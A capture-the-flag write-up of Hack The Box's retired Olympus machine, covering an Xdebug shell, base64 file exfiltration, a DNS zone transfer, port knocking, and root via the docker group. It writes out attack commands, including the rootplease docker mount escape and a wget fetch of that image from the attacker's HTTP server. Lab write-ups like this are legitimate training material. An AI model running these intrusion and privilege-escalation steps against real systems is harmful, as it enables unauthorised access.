Olympus Write-up (HTB)

This is a write-up for the recently retired Olympus machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.

TL;DR: XDebug Shell & Docker Privesc. | At the time of writing, Olympus has been my favourite box on the platform. This is because there were separate stages within User and Root, which added more of a challenge to the system. Also, at each stage, we were given a small hint so that we had a very rough idea of what exactly to look into, whilst also not being given too much.

PART ONE: USER

Let’s begin with an nmap scan. As with many other commands in this post, you can click on them to view a page outlining their syntax.

nmap -sV -sC -oN nmap.log 10.10.10.93

We are immediately given quite a lot of information, but the only crucial parts of this are the 4 open ports: 22 (SSH), 53 (DNS), 80 (HTTP) & 2222 (SSH). Since the SSH versions look fairly recent, let’s take a look at the webpage.

We are shown nothing other than an image.

It doesn’t look as if there’s much information to be found here. I also checked the source code for any clues, but there was very little there. Seeing as we don’t have much to work from, I then tried a dirb scan:

george@kali:~/htb/olympus$ dirb http://10.10.10.83/
-----------------
DIRB v2.22
-----------------
URL_BASE: http://10.10.10.83/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
---- Scanning URL: http://10.10.10.83/ ----
+ http://10.10.10.83/favicon.ico (CODE:200|SIZE:67646)
+ http://10.10.10.83/index.php (CODE:200|SIZE:314)
+ http://10.10.10.83/server-status (CODE:403|SIZE:222)
-----------------

Before long, I found these three files, but they were all useless (other than index.php, which reveals that the server runs PHP). After spending some more time enumerating, I decided to take a look at a simple request in Burp, to exactly what is sent to us by the server:

Our request is on the left, and the server response is on the right.

We can see here that there’s a slightly unusual header in the response: “Xdebug”. I then spent some time looking into this, and discovered that it’s a PHP extension that allows for more simplistic debugging during the development stages of a website. Simply searching for related exploits brought me to this, which is a script that should give us a shell through Xdebug. I saved the script to my system and tested it out:

The syntax of this script is outlined on its github page.

After enumerating the file system for a bit, I found the following (Note: “cd” doesn’t work with this script):

>> ls /home
zeus
>> ls /home/zeus
airgeddon
>> ls /home/zeus/airgeddon
CHANGELOG.md
CODE_OF_CONDUCT.md
CONTRIBUTING.md
Dockerfile
LICENSE.md
README.md
airgeddon.sh
binaries
captured
imgs
known_pins.db
language_strings.sh
pindb_checksum.txt
>> ls /home/zeus/airgeddon/captured
captured.cap
papyrus.txt
>>

Let’s now take a look at these files…

>> cat /home/zeus/airgeddon/captured/papyrus.txt
Captured while flying. I'll banish him to Olympia – Zeus
>> cat /home/zeus/airgeddon/captured/captured.cap
>>

It looks like we can’t directly read this, so let’s copy it over to our local machine by Base64 encoding the file:

>> base64 /home/zeus/airgeddon/captured/captured.cap
1MOyoQIABAAAAAAAAAAAAP//AABpAAAAiQ/KWhnGBwANAQAADQEAAIAAAAD////////07DirqKn0
7DirqKkwU4BN/QcAAAAAZAAxBAAUVG9vX2NsMHNlX3RvX3RoM19TdW4BCIKEi5YMEhgkAwEIBQQA
AQAAKgEAMBQBAAAPrAQBAAAPrAQBAAAPrAIAADIEMEhgbN0YAFDyAgEBhQADpAAAJ6QAAEJDXgBi
Mi8A3R4AkEwzThEb/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtGk4RG/8AAAAAAAAAAAAAAAAAAAAA
AAAAAAAA3RoAkEw0CA8KAAAAAAAAAAAAAAAAAAAAAAAAAD0WCA8KAAAAAAAAAAAAAAAAAAAAAAAA
AN0JAAN/AQEAAP9/3QoAA38EAQAAAEAAiQ/KWhlMCgDVAAAA1QAAAAhCAAABAF5///r07DirqKm0
tS+Q+xlABREAAGAAAAAAaw2N2NDWKng8JbsBpVACtfT/japlzX5NsHGeF+9PXURMIuqBnxUMvS5H
wmYARmoqe+U4fPHuJOuQfxA1HIaLIy7orpRB/rb4zIVJQLjGZsm/wUO7u5mEI2dpGuy3RubPJIrI
iivKvTj+/2Xd+RI94cJlKYNHueCJuWe1y6GBdUdLVhiGZcQ01b2B90ymG0qTimsQDOpoS8E1KmLG
5/EDJPxvyeYPXIgqAESDV7tdVdr6FNK7EYkPylpAjg4AGgAAABoAAADAADoB////////9Ow4q6i
>>

Now all we have to do (on our local machine) is decode this and store the output into a new file. With this file now decoded, we can inspect it with tcpdump:

tcpdump -r decoded_capture.cap

As shown, the string “Too_cl0se_to_th3_Sun” looks very much like a password, and so I figured that it was time to try and SSH in. I spent some time looking for a possible username to use, but it turns out that we just had to guess it from the contents of papyrus.txt. As the clue suggests, the user is Icarus. We also have to use the SSH port 2222, since port 22 is filtered.

ssh icarus@10.10.10.83 -p 2222

As shown in the screenshot, we still don’t quite have the user flag. Instead, we are just given another hint. Since as we are given a domain, let’s use dig to further enumerate the domains on this box:

dig @10.10.10.83 ctfolympus.htb -t AXFR

We can now immediately see some interesting entries:

• ctfolympus.htb. 86400 IN TXT “prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!”
• RhodesColossus.ctfolympus.htb. 86400 IN TXT “Here lies the great Colossus of Rhodes”
• hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.

Let’s begin by looking at the first entry here. We are given what looks like a username (“prometheus”), a password (“St34l_th3_F1re!”) and some interesting numbers. Since the text says that we must “open a temporal portal”, we can infer that we must use these numbers in order to open a service. Essentially, this all points to port knocking.

In order to do this, we’ve initially got to install knockd, and then use it like so:

Terminal 1: An initial nmap scan — Port 22 is filtered.

Terminal 2: We perform the port knocking.

Terminal 3: A second nmap scan — Port 22 has opened!

Now that this port is open, let’s SSH in with the credentials supplied earlier:

We have the user flag!

I’ve been told that this wasn’t actually the intended route, and that there was supposed to be another stage in between the two users. But if it works, it works.

PART TWO: ROOT

Let’s take a look inside the home directory:

“Only if you serve well to the gods, you’ll be able to enter into the olympus”.

At the moment, it doesn’t seem like this tip is very useful. Whilst doing some enumeration on my user, I ran groups, which had the following output:

prometheus@olympus:~$ groups
prometheus cdrom floppy audio dip video plugdev netdev bluetooth docker

Whilst enumerating a different box, I had followed a rabbit hole and accidentally learnt a lot about docker privilege escalation, which simply requires the user to be in the docker group to perform. Because of this, the docker group immediately peaked my interest.

A Google search reveals a good POC by Chris Foster, in which you can pull off the privesc in one command:

> docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

Let’s try using docker to pull the chrisfosterelli/rootplease container:

This command should download/install the specified container.

As with all HTB boxes, we don’t have access to the internet. Instead, (as the hint suggests), we’ve got to serve it over to the box. In order to do this, I first ran pulled rootplease to my local machine, saved it, served it over via a Python HTTP server, and then loaded it on the box. If you need help configuring docker in kali, just follow this tutorial.

I’ll run through the commands that I used here:

[local] >> sudo service docker start
[local] >> sudo docker pull chrisfosterelli/rootplease
[local] >> sudo docker save -o rootplease.tar chrisfosterelli/rootplease
[local] >> python -m SimpleHTTPServer 5555
[olympus] >> wget http://10.10.15.243:5555/rootplease.tar (This may take some time.)
[olypmus] >> docker load -i rootplease.tar

With that now loaded, let’s try running the command mentioned earlier:

Now that we are root, we can read flag.

Contact me:
Personal Website
Twitter
Github
Hack The Box